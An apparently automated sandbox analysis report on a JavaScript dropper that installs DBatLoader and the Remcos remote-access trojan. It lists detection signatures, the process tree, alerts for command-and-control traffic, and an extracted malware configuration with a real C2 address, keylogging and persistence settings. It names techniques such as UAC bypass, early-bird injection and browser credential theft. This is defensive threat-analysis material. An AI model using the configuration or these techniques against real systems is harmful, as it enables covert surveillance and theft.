
Windows Analysis Report
6732832.js

Overview

General Information

Sample name: 6732832.js
Analysis ID: 1639312
MD5: f497655b5c7c0834be1fe0ea0eb7493c
SHA1: b8e7608a478d0b50547e758f4a6567823fa3f311
SHA256: 53bcd29a7e6afd5ff7e507a36fc47c7696106c54259bd8c10c76ac6716fda0ae
Tags: js, RAT, RemcosRAT, user-abuse_ch

Detection

Remcos, DBatLoader
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Drops PE files with a suspicious file extension
Installs a global keyboard hook
Queues an APC in another process (thread injection)
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Suspicious Creation with Colorcpl
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 6628 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6732832.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • x.exe (PID: 6980 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 56432B42A6DF492A60F9577716132B79)
      • cmd.exe (PID: 5656 cmdline: C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\6770.cmd"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5984 cmdline: C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\16992.cmd"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • colorcpl.exe (PID: 5516 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
  • Ekbmajrx.PIF (PID: 7248 cmdline: "C:\Users\user\Links\Ekbmajrx.PIF" MD5: 56432B42A6DF492A60F9577716132B79)
    • colorcpl.exe (PID: 7308 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
  • Ekbmajrx.PIF (PID: 7452 cmdline: "C:\Users\user\Links\Ekbmajrx.PIF" MD5: 56432B42A6DF492A60F9577716132B79)
    • colorcpl.exe (PID: 7504 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution: APT33, The Gorgon Group, UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: DBatLoader
Description: This Delphi loader misuses cloud storage services, such as Google Drive, to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
{"Host:Port:Password": ["196.251.83.79:786:0"], "Assigned name": "HH", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-HRCZR2", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}
Source | Rule | Description | Author | Strings
C:\ProgramData\remcos\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |

Source | Rule | Description | Author | Strings
00000008.00000002.2523747715.0000000032B00000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000008.00000002.2523747715.0000000032AE0000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000003.00000002.1255041481.00000000023DF000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security |
00000008.00000002.2523747715.0000000032AE8000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000010.00000002.1343119653.0000000003000000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |

Source | Rule | Description | Author | Strings
3.2.x.exe.23dfc48.0.raw.unpack | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security |
16.2.colorcpl.exe.3000000.0.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
16.2.colorcpl.exe.3000000.0.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
16.2.colorcpl.exe.3000000.0.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
16.2.colorcpl.exe.3000000.0.raw.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown |
  • 0x6d758:$a1: Remcos restarted by watchdog!
  • 0x6dda8:$a3: %02i:%02i:%02i:%03i

System Summary

Source: File created; Author: frack113, Nasreddine Bencherchali; Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 6980, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Windows\SysWOW64\colorcpl.exe, ProcessId: 5516, TargetFilename: C:\ProgramData\remcos
Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6732832.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6732832.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 496, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6732832.js", ProcessId: 6628, ProcessName: wscript.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\\Users\\user\\Links\Ekbmajrx.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 6980, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ekbmajrx
Source: Process started; Author: Max Altgelt (Nextron Systems); Data: Command: "C:\Users\user\Links\Ekbmajrx.PIF" , CommandLine: "C:\Users\user\Links\Ekbmajrx.PIF" , CommandLine|base64offset|contains: , Image: C:\Users\user\Links\Ekbmajrx.PIF, NewProcessName: C:\Users\user\Links\Ekbmajrx.PIF, OriginalFileName: C:\Users\user\Links\Ekbmajrx.PIF, ParentCommandLine: , ParentImage: , ParentProcessId: 496, ProcessCommandLine: "C:\Users\user\Links\Ekbmajrx.PIF" , ProcessId: 7248, ProcessName: Ekbmajrx.PIF
Source: Process started; Author: Michael Haag; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6732832.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6732832.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 496, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6732832.js", ProcessId: 6628, ProcessName: wscript.exe

Stealing of Sensitive Information

Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Windows\SysWOW64\colorcpl.exe, ProcessId: 5516, TargetFilename: C:\ProgramData\remcos\logs.dat

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-15T09:31:22.521437+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49693 | 196.251.83.79 | 786 | TCP
2025-03-15T09:31:25.137339+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49696 | 196.251.83.79 | 786 | TCP
2025-03-15T09:31:27.761668+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49697 | 196.251.83.79 | 786 | TCP
2025-03-15T09:31:30.406679+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49698 | 196.251.83.79 | 786 | TCP
2025-03-15T09:31:33.063665+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49699 | 196.251.83.79 | 786 | TCP
2025-03-15T09:31:35.703350+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49702 | 196.251.83.79 | 786 | TCP
2025-03-15T09:31:38.345431+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49703 | 196.251.83.79 | 786 | TCP
2025-03-15T09:31:40.984604+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49704 | 196.251.83.79 | 786 | TCP
2025-03-15T09:31:43.613149+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49705 | 196.251.83.79 | 786 | TCP
2025-03-15T09:31:46.269344+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49706 | 196.251.83.79 | 786 | TCP
2025-03-15T09:31:48.910089+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49707 | 196.251.83.79 | 786 | TCP
2025-03-15T09:31:51.534932+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49708 | 196.251.83.79 | 786 | TCP
2025-03-15T09:31:54.176298+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49709 | 196.251.83.79 | 786 | TCP
2025-03-15T09:31:56.800273+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49710 | 196.251.83.79 | 786 | TCP
2025-03-15T09:31:59.457500+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49711 | 196.251.83.79 | 786 | TCP
2025-03-15T09:32:02.097409+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49712 | 196.251.83.79 | 786 | TCP
2025-03-15T09:32:04.738636+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49713 | 196.251.83.79 | 786 | TCP
2025-03-15T09:32:07.394972+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 196.251.83.79 | 786 | TCP
2025-03-15T09:32:10.020325+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49716 | 196.251.83.79 | 786 | TCP
2025-03-15T09:32:12.675501+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49718 | 196.251.83.79 | 786 | TCP
2025-03-15T09:32:15.332382+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49719 | 196.251.83.79 | 786 | TCP
2025-03-15T09:32:17.957780+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49720 | 196.251.83.79 | 786 | TCP
2025-03-15T09:32:20.597598+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49721 | 196.251.83.79 | 786 | TCP
2025-03-15T09:32:23.222698+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49722 | 196.251.83.79 | 786 | TCP
2025-03-15T09:32:25.847823+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49723 | 196.251.83.79 | 786 | TCP
2025-03-15T09:32:28.506777+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49724 | 196.251.83.79 | 786 | TCP
2025-03-15T09:32:31.144340+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49725 | 196.251.83.79 | 786 | TCP
2025-03-15T09:32:33.772652+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49726 | 196.251.83.79 | 786 | TCP
2025-03-15T09:32:36.409860+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49728 | 196.251.83.79 | 786 | TCP
2025-03-15T09:32:39.035951+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49729 | 196.251.83.79 | 786 | TCP
2025-03-15T09:32:41.910893+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49730 | 196.251.83.79 | 786 | TCP
2025-03-15T09:32:44.571145+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49731 | 196.251.83.79 | 786 | TCP
2025-03-15T09:32:47.223569+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49732 | 196.251.83.79 | 786 | TCP
2025-03-15T09:32:49.816417+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49733 | 196.251.83.79 | 786 | TCP
2025-03-15T09:32:52.384069+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49734 | 196.251.83.79 | 786 | TCP
2025-03-15T09:32:54.943020+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49735 | 196.251.83.79 | 786 | TCP
2025-03-15T09:32:57.458364+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49736 | 196.251.83.79 | 786 | TCP
2025-03-15T09:32:59.941581+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49737 | 196.251.83.79 | 786 | TCP
2025-03-15T09:33:02.394133+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49738 | 196.251.83.79 | 786 | TCP
2025-03-15T09:33:04.847377+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49739 | 196.251.83.79 | 786 | TCP
2025-03-15T09:33:07.274195+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49740 | 196.251.83.79 | 786 | TCP
2025-03-15T09:33:09.662705+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49741 | 196.251.83.79 | 786 | TCP
2025-03-15T09:33:12.007178+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49742 | 196.251.83.79 | 786 | TCP
2025-03-15T09:33:14.347337+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49743 | 196.251.83.79 | 786 | TCP
2025-03-15T09:33:16.644300+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49744 | 196.251.83.79 | 786 | TCP
2025-03-15T09:33:18.925743+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49745 | 196.251.83.79 | 786 | TCP
2025-03-15T09:33:21.191058+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49746 | 196.251.83.79 | 786 | TCP
2025-03-15T09:33:23.441247+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49747 | 196.251.83.79 | 786 | TCP
2025-03-15T09:33:25.661455+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49748 | 196.251.83.79 | 786 | TCP


AV Detection

Source: 6732832.js; Avira: detected
Source: C:\Users\user\Links\Ekbmajrx.PIF; Avira: detection malicious, Label: TR/AD.Remcos.lpmfw
Source: C:\Users\user\AppData\Local\Temp\x.exe; Avira: detection malicious, Label: TR/AD.Remcos.lpmfw
Source: 8.2.colorcpl.exe.2e00000.0.unpack; Malware Configuration Extractor: Remcos {"Host:Port:Password": ["196.251.83.79:786:0"], "Assigned name": "HH", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-HRCZR2", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}
Source: C:\Users\user\AppData\Local\Temp\x.exe; ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\x.exe; Virustotal: Detection: 39%
Source: C:\Users\user\Links\Ekbmajrx.PIF; ReversingLabs: Detection: 75%
Source: C:\Users\user\Links\Ekbmajrx.PIF; Virustotal: Detection: 39%
Source: 6732832.js; Virustotal: Detection: 47%
Source: 6732832.js; ReversingLabs: Detection: 41%
Source: Yara match; File source: 16.2.colorcpl.exe.3000000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.colorcpl.exe.2e00000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 16.2.colorcpl.exe.3000000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.colorcpl.exe.2e00000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 19.2.colorcpl.exe.2bd0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 19.2.colorcpl.exe.2bd0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.x.exe.28f0000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000008.00000002.2523747715.0000000032B00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.2523747715.0000000032AE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.2523747715.0000000032AE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000010.00000002.1343119653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.2523856221.00000000344BF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.1269621108.000000007E4F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.1255776445.0000000002925000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000013.00000002.1422872475.0000000002BD0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.2501429735.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000010.00000002.1376834668.0000000030700000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000013.00000002.1422766132.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: x.exe PID: 6980, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: colorcpl.exe PID: 5516, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: colorcpl.exe PID: 7308, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: colorcpl.exe PID: 7504, type: MEMORYSTR
Source: Yara match; File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 8_2_02E33B64 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,8_2_02E33B64
Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 16_2_03033B64 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,16_2_03033B64
Source: x.exe; Binary or memory string: -----BEGIN PUBLIC KEY-----

Exploits

Source: Yara match; File source: 16.2.colorcpl.exe.3000000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.colorcpl.exe.2e00000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 16.2.colorcpl.exe.3000000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.colorcpl.exe.2e00000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 19.2.colorcpl.exe.2bd0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 19.2.colorcpl.exe.2bd0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.x.exe.28f0000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000010.00000002.1343119653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.1269621108.000000007E4F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.1255776445.0000000002925000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000013.00000002.1422872475.0000000002BD0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.2501429735.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: x.exe PID: 6980, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: colorcpl.exe PID: 5516, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: colorcpl.exe PID: 7308, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: colorcpl.exe PID: 7504, type: MEMORYSTR

Privilege Escalation

Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 8_2_02E06ABC _wcslen,CoGetObject,8_2_02E06ABC
Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 16_2_03006ABC _wcslen,CoGetObject,16_2_03006ABC
Source: Binary string: easinvoker.pdb source: x.exe, 00000003.00000003.1234992961.000000007ED63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1267818979.00000000205DE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1234132581.000000007EA0F000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1267818979.0000000020647000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1234992961.000000007ED50000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdbGCTL source: x.exe, 00000003.00000003.1234992961.000000007ED63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1237071641.0000000000979000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1267818979.00000000205DE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1237071641.000000000094A000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000003.1234132581.000000007EA0F000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1267818979.0000000020647000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1234992961.000000007ED50000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\Temp\x.exe; Code function: 3_2_028F52F8 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,3_2_028F52F8
Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 8_2_02E090DC __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,8_2_02E090DC
Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 8_2_02E0B6B5 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,8_2_02E0B6B5
Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 8_2_02E1C7E5 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,8_2_02E1C7E5
Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 8_2_02E0B8BA FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,8_2_02E0B8BA
Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 8_2_02E4E989 FindFirstFileExA,8_2_02E4E989
Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 8_2_02E07EDD __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,8_2_02E07EDD
Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 8_2_02E06F13 FindFirstFileW,FindNextFileW,8_2_02E06F13
Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 8_2_02E19CEE FindFirstFileW,FindNextFileW,FindNextFileW,8_2_02E19CEE
Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 8_2_02E08CDE __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,8_2_02E08CDE
Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 16_2_030090DC __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,16_2_030090DC
Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 16_2_0301C7E5 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,16_2_0301C7E5
Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 16_2_0300B6B5 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,16_2_0300B6B5
Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 16_2_0304E989 FindFirstFileExA,16_2_0304E989
Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 16_2_0300B8BA FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,16_2_0300B8BA
Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 16_2_03006F13 FindFirstFileW,FindNextFileW,16_2_03006F13
Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 16_2_03007EDD __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,16_2_03007EDD
Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 16_2_03008CDE __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,16_2_03008CDE
Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 16_2_03019CEE FindFirstFileW,FindNextFileW,FindNextFileW,16_2_03019CEE
